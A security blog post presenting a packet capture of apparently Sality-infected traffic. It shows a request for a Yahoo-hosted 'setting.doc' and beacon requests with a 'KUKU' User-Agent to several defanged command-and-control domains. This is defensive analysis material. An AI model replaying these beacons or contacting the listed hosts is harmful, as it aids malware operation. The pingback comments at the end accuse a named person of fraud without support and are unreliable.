Another Sality Family Malware Traffic Example – Using Yahoo Document as TTP Vector

By | June 19, 2015

2013-02-03 18:20:55.267923 IP 172.16.253.129.53 > 8.8.8.8.53: 39453+ A? yahoo[.]com. (27)
E..7……………..5.5.#_\………….yahoo[.]com…..
2013-02-03 18:20:55.267969 IP 172.16.253.129.53 > 4.2.2.2.53: 39453+ A? yahoo[.]com. (27)
E..7……………..5.5.#ih………….yahoo[.]com…..
2013-02-03 18:20:55.294540 IP 4.2.2.2.53 > 172.16.253.129.53: 39453 3/0/0 A 98.139.183.24, A 98.138.253.109, A 206.190.36.45 (75)
E..g……………..5.5.SH…………..yahoo[.]com……………..b……………b..m…………..$-
2013-02-03 18:20:55.294559 IP 8.8.8.8.53 > 172.16.253.129.53: 39453 3/0/0 A 206.190.36.45, A 98.138.253.109, A 98.139.183.24 (75)
E..g……………..5.5.SP…………..yahoo[.]com……………….$-…………b..m…………b…
2013-02-03 18:20:55.331487 IP 172.16.253.129.1044 > 98.139.183.24.80: Flags [S], seq 1729162271, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…7w….b……Pg…….p…md……….
2013-02-03 18:20:55.378176 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [S.], seq 2454102501, ack 1729162272, win 64240, options [mss 1460], length 0
E..,……x.b……..P…F..g.. `…N………
2013-02-03 18:20:55.378231 IP 172.16.253.129.1044 > 98.139.183.24.80: Flags [.], ack 1, win 64240, length 0
E..(..@…7~….b……Pg.. .F..P…e…
2013-02-03 18:20:55.378401 IP 172.16.253.129.1044 > 98.139.183.24.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71
E..o..@…76….b……Pg.. .F..P…….GET /setting.doc HTTP/1.1
Host: yahoo[.]com
Cache-Control: no-cache
2013-02-03 18:20:55.378531 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [.], ack 72, win 64240, length 0
E..(……x.b……..P…F..g..gP…e………
2013-02-03 18:20:55.434887 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [P.], seq 1:1461, ack 72, win 64240, length 1460
E………s.b……..P…F..g..gP…K”..HTTP/1.1 200 OK
Date: Sat, 17 Aug 2013 16:00:28 GMT
P3P: policyref=”http://info.yahoo[.]com/w3c/p3p.xml”, CP=”CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV”
Cache-Control: private
Last-Modified: Fri, 04 Jan 2013 11:09:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Via: HTTP/1.1 ir13.fp.bf1.yahoo[.]com (YahooTrafficServer/1.20.13 [c sSf ])
Server: YTS/1.20.13

992
<html>
<head>
<meta http-equiv=”refresh” content=”10;url=/”>
<title>Yahoo!</title>
</head>

<body>
<center>
<table width=650 cellpadding=0 cellspacing=2 border=0>
<tr>
<td width=1% valign=top><a href=”/404/*http://www.yahoo[.]com”><img src=http://us.i1.yimg[.]com/us.yimg[.]com/i/yahoo.gif width=147 height=31 border=0 alt=”Yahoo”></a></td>
<td align=right><font face=arial size=-1><a href=”/404/*http://www.yahoo[.]com”>Yahoo!</a> – <a href=”/404/*http://help.yahoo[.]com”>Help</a></font><hr size=1 noshade></td>
</tr>
</table>
<br><br>
<table width=500 cellpadding=7 cellspacing=0 border=0>
<tr><td align=center><font face=arial size=+1><b>Sorry, the page you requested was not found.</b></font></td></tr>
<tr><td><font face=arial size=-1>Please check the URL for proper spelling and capitalization. If you’re having trouble locating a destination on Yahoo!, try visiting the
2013-02-03 18:20:55.436555 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [P.], seq 1461:2921, ack 72, win 64240, length 1460
E………s.b……..P…F..g..gP….z.. <b><a href=”/404/*http://www.yahoo[.]com”>Yahoo! home page</a></b> or look through a list of <b><a href=”/404/*http://docs.yahoo[.]com/docs/family/more.html”>Yahoo!’s online services</a></b>. Also, you may find what you’re looking for if you try searching below.</font>
2013-02-03 18:20:56.494474 IP 172.16.253.129.1044 > 98.139.183.24.80: Flags [P.], seq 72:143, ack 3046, win 64115, length 71
E..o.!@…72….b……Pg..g.F..P..s….GET /setting.doc HTTP/1.1
Host: yahoo[.]com
Cache-Control: no-cache
2013-02-03 18:20:56.494757 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [.], ack 143, win 64240, length 0
E..(……x.b……..P…F..g…P…Yx……..
2013-02-03 18:20:56.542535 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [P.], seq 3046:4506, ack 143, win 64240, length 1460
E………r.b……..P…F..g…P…=…HTTP/1.1 200 OK
Date: Sat, 17 Aug 2013 16:00:30 GMT
P3P: policyref=”http://info.yahoo[.]com/w3c/p3p.xml”, CP=”CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV”
Cache-Control: private
Last-Modified: Fri, 04 Jan 2013 11:09:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Via: HTTP/1.1 ir13.fp.bf1.yahoo[.]com (YahooTrafficServer/1.20.13 [c sSf ])
Server: YTS/1.20.13
2013-02-03 18:20:56.677007 IP 172.16.253.129.1046 > 98.139.180.149.80: Flags [P.], seq 1:76, ack 1, win 64240, length 75
E..s.*@…9…..b……Pj;..O.@.P…….GET /setting.doc HTTP/1.1
Host: www.yahoo[.]com
Cache-Control: no-cache
2013-02-03 18:20:56.677202 IP 98.139.180.149.80 > 172.16.253.129.1046: Flags [.], ack 76, win 64240, length 0
E..(……{.b……..P..O.@.j;..P………….
2013-02-03 18:20:56.721713 IP 98.139.180.149.80 > 172.16.253.129.1046: Flags [P.], seq 1:447, ack 76, win 64240, length 446
E………yob……..P..O.@.j;..P…;…HTTP/1.1 404 Not Found
Date: Sat, 17 Aug 2013 16:00:30 GMT
Connection: close
Via: HTTP/1.1 ir2.fp.bf1.yahoo[.]com (YahooTrafficServer/1.20.13 [c s f ])
Server: YTS/1.20.13
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 176

<HEAD><TITLE>Not Found</TITLE></HEAD>
<BODY BGCOLOR=”white” FGCOLOR=”black”>
<FONT FACE=”Helvetica,Arial”><B>
</B></FONT>

<!– default “Not Found” response (404) –>
</BODY>
2013-02-03 18:24:12.283577 IP 172.16.253.129.1050 > 62.116.143.18.80: Flags [P.], seq 1:134, ack 1, win 64240, length 133
E….K@………>t…..P3s…..5P…….GET /images/logos.gif?114bbc=9068000 HTTP/1.1
User-Agent: KUKU v5.06exp =9355466431
Host: hayatspa[.]com
Cache-Control: no-cache
2013-02-03 18:24:12.288962 IP 62.116.143.18.80 > 172.16.253.129.1050: Flags [.], ack 134, win 64240, length 0
E..(……..>t…….P…..53s.UP………….
2013-02-03 18:24:12.363373 IP 4.2.2.2.53 > 172.16.253.129.53: 45965 1/0/0 A 62.116.143.18 (46)
E..J……………..5.5.6.E………….hayatspa[.]com…………..X..>t..
2013-02-03 18:24:12.393386 IP 62.116.143.18.80 > 172.16.253.129.1050: Flags [P.], seq 1:357, ack 134, win 64240, length 356
E……….X>t…….P…..53s.UP…….HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 17 Aug 2013 16:03:45 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding

2013-02-03 18:24:13.133744 IP 8.8.8.8.53 > 172.16.253.129.53: 42671 1/0/0 A 208.73.210.210 (46)
E..J. ……………5.5.6!…………..elaswany[.]com…………..s…I..
2013-02-03 18:24:13.135325 IP 172.16.253.129.1053 > 208.73.210.210.80: Flags [S], seq 1077896090, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.]@……….I…..P@?c…..p….9……….
2013-02-03 18:24:13.223789 IP 208.73.210.210.80 > 172.16.253.129.1053: Flags [S.], seq 2798705715, ack 1077896091, win 64240, options [mss 1460], length 0
E..,.
…….I…….P…..3@?c.`…%+……..
2013-02-03 18:24:13.223826 IP 172.16.253.129.1053 > 208.73.210.210.80: Flags [.], ack 1, win 64240, length 0
E..(.^@……….I…..P@?c….4P…<…
2013-02-03 18:24:13.223961 IP 172.16.253.129.1053 > 208.73.210.210.80: Flags [P.], seq 1:127, ack 1, win 64240, length 126
E…._@….D…..I…..P@?c….4P…@*..GET /logos.gif?114f65=2268874 HTTP/1.1
User-Agent: KUKU v5.06exp =9355466431
Host: elaswany[.]com
Cache-Control: no-cache
2013-02-03 18:24:13.224147 IP 208.73.210.210.80 > 172.16.253.129.1053: Flags [.], ack 127, win 64240, length 0
E..(………I…….P…..4@?d.P…<j……..
2013-02-03 18:24:13.303831 IP 4.2.2.2.53 > 172.16.253.129.53: 42671 1/0/0 A 208.73.210.210 (46)
E..J……………..5.5.6″…………..elaswany[.]com………………I..
2013-02-03 18:24:13.303848 IP 208.73.210.210.80 > 172.16.253.129.1053: Flags [R.], seq 1, ack 127, win 64240, length 0
E..(………I…….P…..4@?d.P…<f……..
2013-02-03 18:24:13.316911 IP 172.16.253.129.53 > 8.8.8.8.53: 25001+ A? www.ta7ka[.]com. (31)
E..;.a……………5.5.’!.a…………www.ta7ka[.]com…..
2013-02-03 18:24:13.316983 IP 172.16.253.129.53 > 4.2.2.2.53: 25001+ A? www.ta7ka[.]com. (31)
E..;.b……………5.5.’+*a…………www.ta7ka[.]com…..
2013-02-03 18:24:13.343859 IP 8.8.8.8.53 > 172.16.253.129.53: 25001 NXDomain 0/1/0 (104)
E………………..5.5.p$5a…………www.ta7ka[.]com…………….=.a.gtld-servers.net..nstld.verisign-grs..R..Y……… :…Q.
2013-02-03 18:24:13.344113 IP 172.16.253.129.53 > 8.8.8.8.53: 17227+ A? www.ta7ka[.]com.localdomain. (43)
E..G.e……………5.5.3′.CK………..www.ta7ka[.]com.localdomain…..
2013-02-03 18:24:13.344182 IP 172.16.253.129.53 > 4.2.2.2.53: 17227+ A? www.ta7ka[.]com.localdomain. (43)
E..G.f……………5.5.31.CK………..www.ta7ka[.]com.localdomain…..

E..(.u@…r…………P ..V….P…(…
2013-02-03 18:24:14.004305 IP 172.16.253.129.1054 > 195.22.26.231.80: Flags [P.], seq 1:153, ack 1, win 64240, length 152
E….v@…r2………..P ..V….P…….GET /images/mainfp.gif?1151c6=11350460 HTTP/1.1
User-Agent: KUKU v5.06exp =9355466431
Host: www.ald-transports-express[.]eu
Cache-Control: no-cache
2013-02-03 18:24:14.011518 IP 195.22.26.231.80 > 172.16.253.129.1054: Flags [.], ack 153, win 64240, length 0
E..(…….&………P…… …P…’………
2013-02-03 18:24:14.124189 IP 195.22.26.231.80 > 172.16.253.129.1054: Flags [P.], seq 1:278, ack 153, win 64240, length 277
E..=……………..P…… …P…….HTTP/1.1 200 OK
Server: nginx/1.2.4
Date: Sat, 17 Aug 2013 16:03:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=627522f854555e40aa2c612ac354e32d|68.48.54.191|1376755427|1376755427|0|1|0
Set-Cookie: snkz=68.48.54.191

0

Share Button

2 thoughts on “Another Sality Family Malware Traffic Example – Using Yahoo Document as TTP Vector

  1. Pingback: Margaret Cunniffe is an Australian Fraudster based in Melbourne Victoria who abuses those closest to her to achieve her selfish objectives.

  2. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *